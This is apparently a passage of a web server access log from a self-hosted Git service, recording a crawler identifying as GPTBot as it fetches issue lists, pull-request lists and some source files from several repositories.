"/windpacer/windpacer/pulls?assignee=%28any%29&milestone=-1&sort=nearduedate&state=all&type=all" [Client 74.7.227.38] [Length 9996] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=%28any%29&milestone=-1&state=all&type=all" +[17/Feb/2026:19:25:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=%28any%29&project=-1&sort=nearduedate&state=open&type=all" [Client 74.7.227.38] [Length 10198] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=%28any%29&project=-1&state=open&type=all" +[17/Feb/2026:19:25:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=%28none%29&milestone=-1&sort=oldest&state=closed&type=all" [Client 74.7.227.38] [Length 10190] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=%28none%29&milestone=-1&sort=oldest&state=all&type=all" +[17/Feb/2026:19:25:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=%28none%29&project=-1&sort=nearduedate&state=all&type=all" [Client 74.7.227.38] [Length 10151] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=%28none%29&project=-1&state=all&type=all" +[17/Feb/2026:19:25:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=%28none%29&labels=0&milestone=-1&sort=nearduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10245] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=%28none%29&labels=0&milestone=-1&sort=nearduedate&state=all&type=all" +[17/Feb/2026:19:25:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=%28none%29&labels=0&milestone=-1&sort=leastupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10249] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=%28none%29&labels=0&milestone=-1&sort=leastupdate&state=all&type=all" +[17/Feb/2026:19:25:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=%28any%29&milestone=-1&sort=farduedate&state=open&type=all" [Client 74.7.227.38] [Length 10043] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=%28any%29&milestone=-1&sort=leastcomment&state=open&type=all" +[17/Feb/2026:19:25:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=%28any%29&project=-1&sort=nearduedate&state=open&type=all" [Client 74.7.227.38] [Length 10223] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=%28any%29&project=-1&sort=oldest&state=open&type=all" +[17/Feb/2026:19:25:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=%28any%29&project=-1&sort=leastupdate&state=open&type=all" [Client 74.7.227.38] [Length 10226] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=%28any%29&project=-1&sort=oldest&state=open&type=all" +[17/Feb/2026:19:25:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=%28none%29&project=-1&sort=leastupdate&state=open&type=all" [Client 74.7.227.38] [Length 10055] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=%28none%29&project=-1&sort=leastcomment&state=open&type=all" +[17/Feb/2026:19:25:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=%28any%29&project=-1&sort=recentupdate&state=open&type=all" [Client 74.7.227.38] [Length 10055] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=%28any%29&project=-1&sort=leastcomment&state=open&type=all" +[17/Feb/2026:19:25:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=%28none%29&project=-1&sort=nearduedate&state=open&type=all" [Client 74.7.227.38] [Length 10057] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=%28none%29&project=-1&sort=leastcomment&state=open&type=all" +[17/Feb/2026:19:25:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=%28none%29&project=-1&sort=farduedate&state=open&type=all" [Client 74.7.227.38] [Length 10223] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=%28none%29&project=-1&sort=leastcomment&state=open&type=all" +[17/Feb/2026:19:25:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?labels=0&project=-1&sort=oldest&state=closed&type=all" [Client 74.7.227.38] [Length 10221] [Gzip 3.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?labels=0&project=-1&state=closed&type=all" +[17/Feb/2026:19:25:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?labels=0&milestone=-1&sort=oldest&state=open&type=all" [Client 74.7.227.38] [Length 10188] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?labels=0&milestone=-1&state=open&type=all" +[17/Feb/2026:19:25:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=1&milestone=-1&sort=mostcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10209] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=1&milestone=-1&state=closed&type=all" +[17/Feb/2026:19:25:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=1&milestone=-1&sort=nearduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10209] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=1&milestone=-1&sort=leastcomment&state=closed&type=all" +[17/Feb/2026:19:25:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=1&milestone=-1&sort=leastupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10215] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=1&milestone=-1&state=closed&type=all" +[17/Feb/2026:19:25:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=1&milestone=-1&sort=leastupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10212] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=1&milestone=-1&sort=leastcomment&state=closed&type=all" +[17/Feb/2026:19:25:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?milestone=-1&project=-1&sort=recentupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10026] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?milestone=-1&project=-1&state=closed&type=all" +[17/Feb/2026:19:25:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?milestone=-1&project=-1&sort=leastupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10205] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?milestone=-1&project=-1&state=closed&type=all" +[17/Feb/2026:19:25:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?milestone=-1&project=-1&sort=nearduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10202] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?milestone=-1&project=-1&state=closed&type=all" +[17/Feb/2026:19:25:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?milestone=-1&project=-1&sort=recentupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10202] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?milestone=-1&project=-1&state=closed&type=all" +[17/Feb/2026:19:25:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?labels=0&project=-1&sort=latest&state=open&type=all" [Client 74.7.227.38] [Length 10220] [Gzip 3.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?labels=0&project=-1&sort=oldest&state=open&type=all" +[17/Feb/2026:19:25:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX/CMakeCXXCompilerId.cpp?display=rendered" [Client 74.7.227.38] [Length 11146] [Gzip 3.14] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX/CMakeCXXCompilerId.cpp" +[17/Feb/2026:19:25:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?milestone=-1&project=-1&sort=nearduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10210] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?milestone=-1&sort=nearduedate&state=closed&type=all" +[17/Feb/2026:19:26:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?milestone=-1&project=-1&sort=recentupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10037] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?milestone=-1&sort=recentupdate&state=closed&type=all" +[17/Feb/2026:19:26:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=%28none%29&labels=0&milestone=-1&sort=oldest&state=closed&type=all" [Client 74.7.227.38] [Length 10239] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=%28none%29&labels=0&sort=oldest&state=closed&type=all" +[17/Feb/2026:19:26:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=1&labels=0&milestone=-1&sort=latest&state=closed&type=all" [Client 74.7.227.38] [Length 10231] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=1&labels=0&milestone=-1&state=closed&type=all" +[17/Feb/2026:19:26:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=1&labels=0&milestone=-1&sort=latest&state=closed&type=all" [Client 74.7.227.38] [Length 10228] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=1&labels=0&milestone=-1&sort=mostcomment&state=closed&type=all" +[17/Feb/2026:19:26:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=1&labels=0&milestone=-1&sort=latest&state=closed&type=all" [Client 74.7.227.38] [Length 10048] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=1&labels=0&milestone=-1&state=closed&type=all" +[17/Feb/2026:19:26:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=1&labels=0&milestone=-1&sort=nearduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10232] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=1&labels=0&milestone=-1&sort=mostcomment&state=closed&type=all" +[17/Feb/2026:19:26:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=1&labels=0&milestone=-1&sort=recentupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10060] [Gzip 3.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=1&labels=0&milestone=-1&state=closed&type=all" +[17/Feb/2026:19:26:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=1&labels=0&milestone=-1&sort=leastcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10061] [Gzip 3.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=1&labels=0&milestone=-1&state=closed&type=all" +[17/Feb/2026:19:26:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=1&labels=0&milestone=-1&sort=mostcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10232] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=1&labels=0&milestone=-1&state=closed&type=all" +[17/Feb/2026:19:26:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/.vscode/c_cpp_properties.json?display=rendered" [Client 74.7.227.38] [Length 11002] [Gzip 3.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/.vscode/c_cpp_properties.json" +[17/Feb/2026:19:26:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/.vscode/c_cpp_properties.json?display=rendered" [Client 74.7.227.38] [Length 11000] [Gzip 3.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/.vscode/c_cpp_properties.json" +[17/Feb/2026:19:26:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/.vscode/c_cpp_properties.json?display=rendered" [Client 74.7.227.38] [Length 11001] [Gzip 3.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/.vscode/c_cpp_properties.json" +[17/Feb/2026:19:26:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/.vscode/c_cpp_properties.json?display=rendered" [Client 74.7.227.38] [Length 11000] [Gzip 3.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/.vscode/c_cpp_properties.json" +[17/Feb/2026:19:26:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/.vscode/c_cpp_properties.json?display=rendered" [Client 74.7.227.38] [Length 10999] [Gzip 3.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/.vscode/c_cpp_properties.json" +[17/Feb/2026:19:26:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=1&milestone=-1&sort=recentupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10206] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=1&milestone=-1&sort=leastcomment&state=closed&type=all" +[17/Feb/2026:19:26:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=1&milestone=-1&sort=leastcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10210] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=1&milestone=-1&state=closed&type=all" +[17/Feb/2026:19:26:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=1&milestone=-1&sort=recentupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10209] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=1&milestone=-1&state=closed&type=all" +[17/Feb/2026:19:26:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/src-old/old_codec.cpp?display=source" [Client 74.7.227.38] [Length 13566] [Gzip 4.59] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/src-old/old_codec.cpp" +[17/Feb/2026:19:26:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/src-old/old_codec.cpp?display=source" [Client 74.7.227.38] [Length 13566] [Gzip 4.59] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/src-old/old_codec.cpp" +[17/Feb/2026:19:26:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/.Backup/status.json?display=source" [Client 74.7.227.38] [Length 11284] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/.Backup/status.json" +[17/Feb/2026:19:26:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=%28none%29&labels=0&sort=latest&state=open&type=all" [Client 74.7.227.38] [Length 10213] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=%28none%29&labels=0&sort=leastcomment&state=open&type=all" +[17/Feb/2026:19:26:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=%28any%29&labels=0&sort=latest&state=closed&type=all" [Client 74.7.227.38] [Length 10231] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=%28any%29&labels=0&sort=leastcomment&state=closed&type=all" +[17/Feb/2026:19:26:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?milestone=-1&project=-1&sort=latest&state=all&type=all" [Client 74.7.227.38] [Length 9986] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?milestone=-1&project=-1&state=all&type=all" +[17/Feb/2026:19:26:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?labels=0&project=-1&sort=latest&state=all&type=all" [Client 74.7.227.38] [Length 10172] [Gzip 3.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?project=-1&sort=latest&state=all&type=all" +[17/Feb/2026:19:26:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?milestone=-1&project=-1&sort=latest&state=all&type=all" [Client 74.7.227.38] [Length 9988] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?milestone=-1&project=-1&state=all&type=all" +[17/Feb/2026:19:26:13 +0000] - 404 404 - GET https git.hanmocnn.co.kr "/robots.txt" [Client 74.7.175.175] [Length 19] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36; compatible; OAI-SearchBot/1.3; robots.txt; +https://openai.com/searchbot" "-" +[17/Feb/2026:19:26:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=1&project=-1&sort=farduedate&state=open&type=all" [Client 74.7.227.38] [Length 10195] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=1&project=-1&sort=mostcomment&state=open&type=all" +[17/Feb/2026:19:26:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?labels=0&project=-1&sort=leastcomment&state=open&type=all" [Client 74.7.227.38] [Length 10033] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?labels=0&project=-1&state=open&type=all" +[17/Feb/2026:19:26:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?labels=0&milestone=-1&sort=farduedate&state=open&type=all" [Client 74.7.227.38] [Length 10027] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?labels=0&milestone=-1&state=open&type=all" +[17/Feb/2026:19:26:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?labels=0&project=-1&sort=farduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10024] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?labels=0&project=-1&state=closed&type=all" +[17/Feb/2026:19:26:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?labels=0&project=-1&sort=leastupdate&state=open&type=all" [Client 74.7.227.38] [Length 10196] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?labels=0&project=-1&sort=leastcomment&state=open&type=all" +[17/Feb/2026:19:26:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?labels=0&project=-1&sort=farduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10227] [Gzip 3.47] 